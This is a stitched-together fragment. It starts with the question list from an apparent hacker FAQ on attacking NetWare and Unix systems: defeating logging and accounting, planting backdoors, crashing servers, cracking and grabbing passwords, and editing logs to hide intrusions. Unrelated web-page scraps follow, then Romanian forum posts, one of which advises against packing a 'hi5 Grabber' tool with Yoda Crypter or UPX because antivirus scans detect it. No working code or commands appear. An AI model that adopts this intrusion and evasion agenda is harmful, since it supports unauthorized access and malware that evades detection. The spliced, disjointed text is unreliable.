do I defeat console logging? Can I set the RCONSOLE password to work for just Supervisor? How can I get around a locked MONITOR? Where are the Login Scripts stored in Netware 4.x and can I edit them? What if I can't see SYS:_NETWARE? So how do I access SYS:_NETWARE? How can I boot my server without running STARTUP.NCF/AUTOEXEC.NCF? What else can be done with console access? 22.0 Netware Client Attacks What is the cheesy way to get Supervisor access? How can I login without running the System Login Script in Netware 3.x? How can I get IP info from a Netware server remotely? Does 4.x store the LOGIN password to a temporary file? Everyone can make themselves equivalent to anyone including Admin. How? Can Windows 95 bypass NetWare user security? What is Packet Signature and how do I get around it? 23.0 Netware Denial of Service How can I abend a Netware server? Will Windows 95 cause server problems for Netware? Will Windows 95 cause network problems for Netware? 24.0 Netware Logging and Backdoors How do I leave a backdoor for Netware? What is the rumored "backdoor" in NDS? What is the bindery backdoor in Netware 4.x? Where are the common log files in Netware? What is Accounting? How do I defeat Accounting? What is Intruder Detection? How do I check for Intruder Detection? What are station/time restrictions? How can I tell if something is being Audited in Netware 4.x? How can I remove Auditing if I lost the Audit password? What is interesting about Netware 4.x's licensing? What is the Word Perfect 5.1 trick when running Netware 3.x over DOS? 25.0 Netware Misc. Attack Info How do I spoof my node or IP address? How can I see hidden files and directories? How do I defeat the execute-only flag? How can I hide my presence after altering files? What is a Netware-aware trojan? What are Trustee Directory Assignments? Are there any default Trustee Assignments that can be exploited? What are some general ways to exploit Trustee Rights? Can access to .NCF files help me? Can someone think they've logged out and I walk up and take over? What other Novell and third party programs have holes that give "too much access"? How can I get around disk space requirements? How do I remotely reboot a Netware 3.x file server? What is Netware NFS and is it secure? Can sniffing packets help me break into Netware servers? What else can sniffing around Netware get me? Do any Netware utilities have holes like Unix utilities? Where can I get the Netware APIs? Are there alternatives to Netware's APIs? How can I remove NDS? What are security considerations regarding partitions of the tree? Can a department "Supe" become a regular Admin to the entire tree? Are there products to help improve Netware's security? Is Netware's Web server secure? What's the story with Netware's FTP NLM? Can an IntranetWare server be compromised from the Internet? Are there any problems with Novell's Groupwise? Are there any problems with Netware's Macintosh namespace? What's the story with buffer overflows on Netware? 26.0 Netware Mathematical/Theoretical Info How does the whole password/login/encryption thing work? Are "man in the middle" attacks possible? Are Netware-aware viruses possible? Can a trojaned LOGIN.EXE be inserted during the login process? Is anything "vulnerable" during a password change? Is "data diddling" possible? 27.0 Unix Accounts What are common accounts and passwords for Unix? How can I figure out valid account names for Unix? 28.0 Unix Passwords How do I access the password file in Unix? What's the full story with Unix passwords? How does brute force password cracking work with Unix? How does dictionary password cracking work with Unix? How does a Sys Admin enforce better passwords and password management? So how do I get to those shadowed passwords? So what can I learn with a password file from a heavily secured system? What's the story with SRP? 29.0 Unix Local Attacks Why attack locally? How do most exploits work? So how does a buffer overflow work? 30.0 Unix Remote Attacks What are remote hacks? 31.0 Unix Logging Where are the common log files in Unix? How do I edit/change the log files for Unix? 32.0 Hacker Resources What are some security-related WWW locations? What are some security-related USENET groups? What are some security-related mailing lists? What are some other FAQs?

Video on the Web - Dive Into HTML5 Dive Into HTML5 site de nota zece.

cati oameni crezi ca stiu c ? si cati crezi ca stiu asm ? fa un raport si inmulteste salariul cu acel raport. atat va castiga cp/m daca continua pe partea de asm. cel ce stie asm e mult mai valoros (fiind mai rar de intalnit) decat unul care stie c. a2480f25: Why is reinventing the wheel a good thing ?

Bun venit, Iulian.

Ai putea face si pagina SourceForge.net: hi5 Grabber - Project Web Hosting - Open Source Software Pe langa asta creaza un video tutorial - cum se foloseste - pentru idio?ime, cum sunt multi, vei avea trafic si downloads. http://www.virustotal.com/analisis/4517f19a305215009a57b4404737a310abb3f0e3d42707993f201a26b6d720a1-1274624351 nu-l mai cripta cu yoda crypter. nici upx nu e recomandat...